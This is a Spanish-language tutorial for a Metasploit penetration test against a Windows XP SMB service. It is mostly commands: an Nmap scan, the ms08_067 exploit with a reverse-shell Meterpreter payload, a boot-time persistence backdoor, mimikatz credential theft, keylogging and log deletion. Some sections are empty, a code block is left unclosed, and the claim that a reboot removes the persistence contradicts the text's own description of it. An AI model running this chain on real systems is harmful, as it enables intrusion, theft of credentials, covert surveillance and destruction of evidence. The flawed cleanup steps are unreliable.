Este manual ofrece una guía paso a paso para llevar a cabo una prueba de penetración explotando una vulnerabilidad usando Metasploit Framework. El objetivo es ilustrar el proceso desde el escaneo inicial hasta la explotación y post-explotación.


Sección 1: Preparación del Entorno

Antes de comenzar, asegúrate de tener un entorno controlado y autorizado para realizar pruebas de penetración.

1.1 Requisitos Previos

1.2 Verificación de la Instalación de Metasploit

Ejecuta el siguiente comando para iniciar Metasploit Framework: msfconsole

Confirma que la base de datos está conectada: db_status

Deberías ver un mensaje indicando «Connected to msf_database».


Sección 2: Reconocimiento y Escaneo

2.1 Escaneo con Nmap

Usa Nmap para identificar hosts activos y servicios abiertos: nmap -sS -sV 192.168.1.0/24

Esto listará los puertos abiertos y las versiones de servicios, cruciales para identificar vulnerabilidades.

2.2 Importación de Resultados a Metasploit

Importa los resultados del escaneo a Metasploit: db_import /ruta/a/resultado_nmap.xml

Visualiza los hosts importados: hosts


Sección 3: Selección de la Vulnerabilidad

3.1 Identificación de Vulnerabilidades

Supongamos que el escaneo identifica un servicio SMB en un sistema Windows XP (puerto 445). Busca un exploit relacionado: search smb

3.2 Elección del Exploit

Selecciona el módulo de exploit apropiado, por ejemplo: use exploit/windows/smb/ms08_067_netapi


Sección 4: Configuración del Exploit

4.1 Configuración de Opciones

Revisa las opciones disponibles: show options

Configura las opciones necesarias:

set RHOSTS 192.168.1.100
set PAYLOAD windows/meterpreter/reverse_tcp
set LHOST 192.168.1.10
set LPORT 4444

4.2 Comprobación de Vulnerabilidad

Verifica si el objetivo es vulnerable: check

Un resultado positivo indica que el sistema puede ser explotado.


Sección 5: Ejecución del Exploit

5.1 Lanzamiento del Exploit

Ejecuta el exploit: run

Si es exitoso, deberías obtener una sesión de Meterpreter.

5.2 Comandos Básicos en Meterpreter

  1. Ver información del sistema: sysinfo
  2. Listar archivos en el directorio actual: ls
  3. Descargar un archivo: download archivo.txt /ruta/local
4. Obtener una shell del sistema:
```bash
shell

Sección 6: Post-Explotación

6.1 Persistencia

Configura un mecanismo de persistencia para mantener el acceso: run persistence -U -i 10 -p 4444 -r 192.168.1.10

Esto crea un backdoor que se ejecuta cada vez que el sistema arranca.

6.2 Recolección de Información

  1. Obtener credenciales: run post/windows/gather/credentials/mimikatz
  2. Capturar el registro de teclas: keyscan_start keyscan_dump

Sección 7: Limpieza del Sistema

Es fundamental eliminar cualquier rastro de la prueba:

  1. Sal de Meterpreter: exit
  2. Reinicia el sistema objetivo para eliminar la persistencia.
  3. Borra los logs generados durante la prueba.

Sección 8: Informe Final

Documenta los hallazgos en un informe profesional:


Conclusión

Este manual proporciona una guía completa para realizar pruebas de penetración utilizando Metasploit Framework. Siempre recuerda realizar estas actividades de manera ética y con autorización. Las habilidades adquiridas deben usarse para fortalecer la seguridad, no para comprometerla.